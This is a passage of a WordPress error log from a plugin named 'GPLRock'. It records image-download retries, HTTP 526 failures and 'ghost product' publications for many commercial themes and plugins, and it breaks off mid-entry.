https://meldwp.com/wp-content/uploads/consuloan--multipurpose-consulting-wordpress-theme-13049.webp for product consuloan-multipurpose-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:54:21 UTC] GPLRock: Image download failed for product consuloan-multipurpose-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:54:22 UTC] GPLRock: Image downloaded successfully for product newsy-viral-news-magazine-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-10c6f81e.png [02-Apr-2026 11:54:22 UTC] GPLRock: Using pre-downloaded image for product newsy-viral-news-magazine-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-10c6f81e.png [02-Apr-2026 11:54:22 UTC] GPLRock: Ghost product published with image - Product ID: newsy-viral-news-magazine-wordpress-theme [02-Apr-2026 11:54:23 UTC] GPLRock: Image download failed for product consuloan-multipurpose-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:54:23 UTC] GPLRock: Image downloaded successfully for product discount-rules-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5370b07b.jpg [02-Apr-2026 11:54:23 UTC] GPLRock: Using pre-downloaded image for product discount-rules-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5370b07b.jpg [02-Apr-2026 11:54:23 UTC] GPLRock: Ghost product published with image - Product ID: discount-rules-for-woocommerce [02-Apr-2026 11:54:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/consuloan--multipurpose-consulting-wordpress-theme-13049.webp for product consuloan-multipurpose-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:54:25 UTC] GPLRock WARNING: Image download failed for product consuloan-multipurpose-consulting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/consuloan--multipurpose-consulting-wordpress-theme-13049.webp [02-Apr-2026 11:54:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: consuloan-multipurpose-consulting-wordpress-theme [02-Apr-2026 11:54:25 UTC] GPLRock: Image download failed for product edrea-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:54:28 UTC] GPLRock: Image download failed for product edrea-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:54:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/edrea---personal-portfolio-wordpress-theme-4010.webp for product edrea-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:54:30 UTC] GPLRock: Image download failed for product edrea-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:54:32 UTC] GPLRock: Image download failed for product edrea-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:54:32 UTC] GPLRock: Image downloaded successfully for product streamit-video-streaming-wordpress-theme-rtl (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0895c116.png [02-Apr-2026 11:54:32 UTC] GPLRock: Using pre-downloaded image for product streamit-video-streaming-wordpress-theme-rtl: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0895c116.png [02-Apr-2026 11:54:32 UTC] GPLRock: Ghost product published with image - Product ID: streamit-video-streaming-wordpress-theme-rtl [02-Apr-2026 11:54:33 UTC] GPLRock: Image downloaded successfully for product page-generator-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e168e065.png [02-Apr-2026 11:54:33 UTC] GPLRock: Using pre-downloaded image for product page-generator-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e168e065.png [02-Apr-2026 11:54:33 UTC] GPLRock: Ghost product published with image - Product ID: page-generator-pro [02-Apr-2026 11:54:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/edrea---personal-portfolio-wordpress-theme-4010.webp for product edrea-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:54:34 UTC] GPLRock WARNING: Image download failed for product edrea-personal-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/edrea---personal-portfolio-wordpress-theme-4010.webp [02-Apr-2026 11:54:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: edrea-personal-portfolio-wordpress-theme [02-Apr-2026 11:54:34 UTC] GPLRock: Image download failed for product adda-blog-fashion-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:54:36 UTC] GPLRock: Image download failed for product adda-blog-fashion-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:54:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/adda---blog--fashion-wordpress-theme-6226.webp for product adda-blog-fashion-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:54:38 UTC] GPLRock: Image download failed for product adda-blog-fashion-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:54:40 UTC] GPLRock: Image download failed for product adda-blog-fashion-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:54:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/adda---blog--fashion-wordpress-theme-6226.webp for product adda-blog-fashion-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:54:43 UTC] GPLRock WARNING: Image download failed for product adda-blog-fashion-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/adda---blog--fashion-wordpress-theme-6226.webp [02-Apr-2026 11:54:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: adda-blog-fashion-wordpress-theme [02-Apr-2026 11:54:43 UTC] GPLRock: Image download failed for product versatile-responsive-multi-purpose-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:54:43 UTC] GPLRock: Image download failed for product jetengine-for-elementor (attempt 1/3). HTTP Code: 0, Error: Connection timed out after 10002 milliseconds. Retrying... [02-Apr-2026 11:54:45 UTC] GPLRock: Image download failed for product versatile-responsive-multi-purpose-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:54:47 UTC] GPLRock: Image downloaded successfully for product jetengine-for-elementor (attempt 2) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8664844c.jpg [02-Apr-2026 11:54:47 UTC] GPLRock: Using pre-downloaded image for product jetengine-for-elementor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8664844c.jpg [02-Apr-2026 11:54:47 UTC] GPLRock: Ghost product published with image - Product ID: jetengine-for-elementor [02-Apr-2026 11:54:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/versatile---responsive-multi-purpose-wordpress-32905.webp for product versatile-responsive-multi-purpose-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:54:47 UTC] GPLRock: Image download failed for product versatile-responsive-multi-purpose-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:54:48 UTC] GPLRock: Image downloaded successfully for product seosight-seo-digital-marketing-agency-wp-theme-with-shop (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-09fb4b2c.jpg [02-Apr-2026 11:54:48 UTC] GPLRock: Using pre-downloaded image for product seosight-seo-digital-marketing-agency-wp-theme-with-shop: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-09fb4b2c.jpg [02-Apr-2026 11:54:48 UTC] GPLRock: Ghost product published with image - Product ID: seosight-seo-digital-marketing-agency-wp-theme-with-shop [02-Apr-2026 11:54:49 UTC] GPLRock: Image download failed for product versatile-responsive-multi-purpose-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:54:50 UTC] GPLRock: Image downloaded successfully for product smart-slider-3 (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9c270b13.jpg [02-Apr-2026 11:54:50 UTC] GPLRock: Using pre-downloaded image for product smart-slider-3: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9c270b13.jpg [02-Apr-2026 11:54:50 UTC] GPLRock: Ghost product published with image - Product ID: smart-slider-3 [02-Apr-2026 11:54:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/versatile---responsive-multi-purpose-wordpress-32905.webp for product versatile-responsive-multi-purpose-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:54:51 UTC] GPLRock WARNING: Image download failed for product versatile-responsive-multi-purpose-wordpress. URL: https://meldwp.com/wp-content/uploads/versatile---responsive-multi-purpose-wordpress-32905.webp [02-Apr-2026 11:54:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: versatile-responsive-multi-purpose-wordpress [02-Apr-2026 11:54:51 UTC] GPLRock: Image download failed for product nastik-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:54:51 UTC] GPLRock: Image downloaded successfully for product consulting-business-finance-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5c2002b5.avif [02-Apr-2026 11:54:51 UTC] GPLRock: Using pre-downloaded image for product consulting-business-finance-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5c2002b5.avif [02-Apr-2026 11:54:51 UTC] GPLRock: Ghost product published with image - Product ID: consulting-business-finance-wordpress-theme [02-Apr-2026 11:54:53 UTC] GPLRock: Image download failed for product nastik-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:54:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nastik---creative-portfolio-wordpress-theme-30497.webp for product nastik-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:54:56 UTC] GPLRock: Image download failed for product nastik-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:54:58 UTC] GPLRock: Image download failed for product nastik-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:55:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nastik---creative-portfolio-wordpress-theme-30497.webp for product nastik-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:55:00 UTC] GPLRock WARNING: Image download failed for product nastik-creative-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/nastik---creative-portfolio-wordpress-theme-30497.webp [02-Apr-2026 11:55:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nastik-creative-portfolio-wordpress-theme [02-Apr-2026 11:55:00 UTC] GPLRock: Image downloaded successfully for product barristar-law-lawyer-and-attorney-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a1d3ceda.webp [02-Apr-2026 11:55:00 UTC] GPLRock: Using pre-downloaded image for product barristar-law-lawyer-and-attorney-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a1d3ceda.webp [02-Apr-2026 11:55:00 UTC] GPLRock: Ghost product published with image - Product ID: barristar-law-lawyer-and-attorney-wordpress-theme [02-Apr-2026 11:55:00 UTC] GPLRock: Image download failed for product fitpro-events-fitness-gym-sports-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:55:02 UTC] GPLRock: Image download failed for product fitpro-events-fitness-gym-sports-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:55:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fitpro---events-fitness-gym-sports-wordpress-theme-2618.webp for product fitpro-events-fitness-gym-sports-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:55:04 UTC] GPLRock: Image download failed for product fitpro-events-fitness-gym-sports-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:55:07 UTC] GPLRock: Image download failed for product fitpro-events-fitness-gym-sports-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:55:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fitpro---events-fitness-gym-sports-wordpress-theme-2618.webp for product fitpro-events-fitness-gym-sports-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:55:09 UTC] GPLRock WARNING: Image download failed for product fitpro-events-fitness-gym-sports-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/fitpro---events-fitness-gym-sports-wordpress-theme-2618.webp [02-Apr-2026 11:55:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fitpro-events-fitness-gym-sports-wordpress-theme [02-Apr-2026 11:55:09 UTC] GPLRock: Image download failed for product legasy-beauty-spa-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:55:11 UTC] GPLRock: Image download failed for product legasy-beauty-spa-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:55:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/legasy---beauty--spa-wordpress-theme-19097.webp for product legasy-beauty-spa-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:55:13 UTC] GPLRock: Image download failed for product legasy-beauty-spa-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:55:15 UTC] GPLRock: Image download failed for product legasy-beauty-spa-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:55:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/legasy---beauty--spa-wordpress-theme-19097.webp for product legasy-beauty-spa-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:55:17 UTC] GPLRock WARNING: Image download failed for product legasy-beauty-spa-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/legasy---beauty--spa-wordpress-theme-19097.webp [02-Apr-2026 11:55:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: legasy-beauty-spa-wordpress-theme [02-Apr-2026 11:55:17 UTC] GPLRock: Image download failed for product satka-satellite-tv-internet-provider-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:55:19 UTC] GPLRock: Image download failed for product satka-satellite-tv-internet-provider-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:55:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/satka---satellite-tv--internet-provider-wordpress-theme-14732.webp for product satka-satellite-tv-internet-provider-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:55:23 UTC] GPLRock: Image download failed for product satka-satellite-tv-internet-provider-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:55:25 UTC] GPLRock: Image download failed for product satka-satellite-tv-internet-provider-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 11:55:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/satka---satellite-tv--internet-provider-wordpress-theme-14732.webp for product satka-satellite-tv-internet-provider-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 11:55:27 UTC] GPLRock WARNING: Image download failed for product satka-satellite-tv-internet-provider-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/satka---satellite-tv--internet-provider-wordpress-theme-14732.webp [02-Apr-2026 11:55:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: satka-satellite-tv-internet-provider-wordpress-theme [02-Apr-2026 11:57:28 UTC] GPLRock: Image downloaded successfully for product clientcy-business-startup-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-14a6e3d3.webp [02-Apr-2026 11:57:28 UTC] GPLRock: Using pre-downloaded image for product clientcy-business-startup-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-14a6e3d3.webp [02-Apr-2026 11:57:28 UTC] GPLRock: Ghost product published with image - Product ID: clientcy-business-startup-elementor-template-kit [02-Apr-2026 11:57:29 UTC] GPLRock: Image downloaded successfully for product clickbuy-shoe-store-woocommerce-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9e5ad827.webp [02-Apr-2026 11:57:30 UTC] GPLRock: Using pre-downloaded image for product clickbuy-shoe-store-woocommerce-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9e5ad827.webp [02-Apr-2026 11:57:30 UTC] GPLRock: Ghost product published with image - Product ID: clickbuy-shoe-store-woocommerce-elementor-template-kit [02-Apr-2026 11:57:31 UTC] GPLRock: Image downloaded successfully for product cleniz-cleaning-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d50c9390.webp [02-Apr-2026 11:57:31 UTC] GPLRock: Using pre-downloaded image for product cleniz-cleaning-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d50c9390.webp [02-Apr-2026 11:57:31 UTC] GPLRock: Ghost product published with image - Product ID: cleniz-cleaning-services-elementor-template-kit [02-Apr-2026 11:57:33 UTC] GPLRock: Image downloaded successfully for product clearview-eyeglasses-eyewear-store-woocommerce-eleor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-20371bf3.jpg [02-Apr-2026 11:57:33 UTC] GPLRock: Using pre-downloaded image for product clearview-eyeglasses-eyewear-store-woocommerce-eleor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-20371bf3.jpg [02-Apr-2026 11:57:33 UTC] GPLRock: Ghost product published with image - Product ID: clearview-eyeglasses-eyewear-store-woocommerce-eleor-template-kit [02-Apr-2026 11:57:34 UTC] GPLRock: Image downloaded successfully for product cleansee-cleaning-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b6f3f896.webp [02-Apr-2026 11:57:34 UTC] GPLRock: Using pre-downloaded image for product cleansee-cleaning-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b6f3f896.webp [02-Apr-2026 11:57:34 UTC] GPLRock: Ghost product published with image - Product ID: cleansee-cleaning-service-elementor-template-kit [02-Apr-2026 11:57:35 UTC] GPLRock: Image downloaded successfully for product cleanox-laundry-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4e5703c8.webp [02-Apr-2026 11:57:36 UTC] GPLRock: Using pre-downloaded image for product cleanox-laundry-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4e5703c8.webp [02-Apr-2026 11:57:36 UTC] GPLRock: Ghost product published with image - Product ID: cleanox-laundry-service-elementor-template-kit [02-Apr-2026 11:57:37 UTC] GPLRock: Image downloaded successfully for product cleanly-cleaning-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-57450a4c.webp [02-Apr-2026 11:57:37 UTC] GPLRock: Using pre-downloaded image for product cleanly-cleaning-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-57450a4c.webp [02-Apr-2026 11:57:37 UTC] GPLRock: Ghost product published with image - Product ID: cleanly-cleaning-service-elementor-template-kit [02-Apr-2026 11:57:38 UTC] GPLRock: Image downloaded successfully for product cleaning-small-business-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6dd67f00.webp [02-Apr-2026 11:57:38 UTC] GPLRock: Using pre-downloaded image for product cleaning-small-business-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6dd67f00.webp [02-Apr-2026 11:57:38 UTC] GPLRock: Ghost product published with image - Product ID: cleaning-small-business-template-kit [02-Apr-2026 11:57:40 UTC] GPLRock: Image downloaded successfully for product cleanary-cleaning-service-company-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-147a23af.webp [02-Apr-2026 11:57:40 UTC] GPLRock: Using pre-downloaded image for product cleanary-cleaning-service-company-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-147a23af.webp [02-Apr-2026 11:57:40 UTC] GPLRock: Ghost product published with image - Product ID: cleanary-cleaning-service-company-elementor-template-kit [02-Apr-2026 11:57:41 UTC] GPLRock: Image downloaded successfully for product clamby-fashion-ecommerce-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c1c368fe.webp [02-Apr-2026 11:57:41 UTC] GPLRock: Using pre-downloaded image for product clamby-fashion-ecommerce-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c1c368fe.webp [02-Apr-2026 11:57:41 UTC] GPLRock: Ghost product published with image - Product ID: clamby-fashion-ecommerce-elementor-template-kit [02-Apr-2026 12:01:18 UTC] GPLRock: Image downloaded successfully for product ait-citadela-blocks (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-59951bdb.jpg [02-Apr-2026 12:01:18 UTC] GPLRock: Using pre-downloaded image for product ait-citadela-blocks: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-59951bdb.jpg [02-Apr-2026 12:01:18 UTC] GPLRock: Ghost product published with image - Product ID: ait-citadela-blocks [02-Apr-2026 12:01:19 UTC] GPLRock: Image downloaded successfully for product geodirectory-social-importer (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3ca9e6b8.jpg [02-Apr-2026 12:01:19 UTC] GPLRock: Using pre-downloaded image for product geodirectory-social-importer: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3ca9e6b8.jpg [02-Apr-2026 12:01:19 UTC] GPLRock: Ghost product published with image - Product ID: geodirectory-social-importer [02-Apr-2026 12:01:21 UTC] GPLRock: Image downloaded successfully for product woocommerce-single-product-page-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-debae123.jpg [02-Apr-2026 12:01:21 UTC] GPLRock: Using pre-downloaded image for product woocommerce-single-product-page-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-debae123.jpg [02-Apr-2026 12:01:21 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-single-product-page-builder [02-Apr-2026 12:01:23 UTC] GPLRock: Image downloaded successfully for product whizz-photography-wordpress-for-photography (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-aca771d0.jpg [02-Apr-2026 12:01:23 UTC] GPLRock: Using pre-downloaded image for product whizz-photography-wordpress-for-photography: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-aca771d0.jpg [02-Apr-2026 12:01:23 UTC] GPLRock: Ghost product published with image - Product ID: whizz-photography-wordpress-for-photography [02-Apr-2026 12:01:24 UTC] GPLRock: Image downloaded successfully for product grand-photography-photography-wordpress-for-photography (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7ae43986.jpg [02-Apr-2026 12:01:25 UTC] GPLRock: Using pre-downloaded image for product grand-photography-photography-wordpress-for-photography: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7ae43986.jpg [02-Apr-2026 12:01:25 UTC] GPLRock: Ghost product published with image - Product ID: grand-photography-photography-wordpress-for-photography [02-Apr-2026 12:01:26 UTC] GPLRock: Image downloaded successfully for product searchwp-polylang-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6c3f174b.jpg [02-Apr-2026 12:01:26 UTC] GPLRock: Using pre-downloaded image for product searchwp-polylang-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6c3f174b.jpg [02-Apr-2026 12:01:26 UTC] GPLRock: Ghost product published with image - Product ID: searchwp-polylang-integration [02-Apr-2026 12:01:28 UTC] GPLRock: Image downloaded successfully for product shoppystore-multipurpose-responsive-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-02feb6f2.jpg [02-Apr-2026 12:01:28 UTC] GPLRock: Using pre-downloaded image for product shoppystore-multipurpose-responsive-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-02feb6f2.jpg [02-Apr-2026 12:01:28 UTC] GPLRock: Ghost product published with image - Product ID: shoppystore-multipurpose-responsive-woocommerce-wordpress-theme [02-Apr-2026 12:01:29 UTC] GPLRock: Image downloaded successfully for product wpdiscuz-comment-author-info (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-180731ce.jpg [02-Apr-2026 12:01:29 UTC] GPLRock: Using pre-downloaded image for product wpdiscuz-comment-author-info: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-180731ce.jpg [02-Apr-2026 12:01:29 UTC] GPLRock: Ghost product published with image - Product ID: wpdiscuz-comment-author-info [02-Apr-2026 12:01:30 UTC] GPLRock: Image downloaded successfully for product woocommerce-print-invoices-packing-lists (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-37b64ff9.jpg [02-Apr-2026 12:01:31 UTC] GPLRock: Using pre-downloaded image for product woocommerce-print-invoices-packing-lists: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-37b64ff9.jpg [02-Apr-2026 12:01:31 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-print-invoices-packing-lists [02-Apr-2026 12:01:32 UTC] GPLRock: Image downloaded successfully for product learndash-lms-visual-customizer (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-478bf720.jpg [02-Apr-2026 12:01:32 UTC] GPLRock: Using pre-downloaded image for product learndash-lms-visual-customizer: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-478bf720.jpg [02-Apr-2026 12:01:32 UTC] GPLRock: Ghost product published with image - Product ID: learndash-lms-visual-customizer [02-Apr-2026 12:08:55 UTC] GPLRock: Image downloaded successfully for product wordpress-multilingual-mailchimp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9b04f01a.jpg [02-Apr-2026 12:08:55 UTC] GPLRock: Using pre-downloaded image for product wordpress-multilingual-mailchimp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9b04f01a.jpg [02-Apr-2026 12:08:55 UTC] GPLRock: Ghost product published with image - Product ID: wordpress-multilingual-mailchimp [02-Apr-2026 12:08:56 UTC] GPLRock: Image downloaded successfully for product monolit-responsive-architecture-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6612e658.jpg [02-Apr-2026 12:08:56 UTC] GPLRock: Using pre-downloaded image for product monolit-responsive-architecture-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6612e658.jpg [02-Apr-2026 12:08:56 UTC] GPLRock: Ghost product published with image - Product ID: monolit-responsive-architecture-wordpress-theme [02-Apr-2026 12:08:58 UTC] GPLRock: Image downloaded successfully for product wpfomify-active-campaign-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-66c5eaab.jpg [02-Apr-2026 12:08:58 UTC] GPLRock: Using pre-downloaded image for product wpfomify-active-campaign-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-66c5eaab.jpg [02-Apr-2026 12:08:58 UTC] GPLRock: Ghost product published with image - Product ID: wpfomify-active-campaign-addon [02-Apr-2026 12:08:59 UTC] GPLRock: Image downloaded successfully for product eventon-ticket-variations-options (attempt 1) to: 